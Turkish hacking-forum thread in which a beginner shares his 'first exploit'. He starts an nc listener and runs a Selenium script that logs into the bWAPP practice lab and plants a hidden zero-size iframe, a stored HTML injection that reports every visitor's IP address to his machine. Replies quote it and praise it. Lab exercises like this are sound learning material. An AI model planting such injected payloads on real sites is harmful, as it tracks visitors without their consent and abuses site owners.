ilk exploitim

yuathay

Katılımcı Üye
7 Mar 2023
377
180
Gitti

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​


from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek

 

kerem000

Yeni üye
12 Ağu 2008
16
7
baslangıc seviyesi ise güzel olmus fakat böyle ip vermek vs eklenti islerine döndü ama tabi basarılı yinede daha farklı projeler yapman gerek artık dunyamız yapay zekaya dönüyor, biliyorsun onlar dahi exploit yazabiliyor hackerlık uzerınden degilde web ve devops uzerıne exp projeleri olusturursan kafanda daha da guzel seyler cıkarabilirsin emegine saglık
 
10 Ağu 2022
168
100

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​


from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek

eline sağlık
 

Bekbilisim

Yeni üye
29 Kas 2021
42
15

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​


from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek

Eline sağlık
 

powwerbangTR

Katılımcı Üye
25 Ağu 2017
513
117
Eline sağlık honeypod araştırması yaparsan daha ileri seviyeye geçeceğine inanıyorum başarılar.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.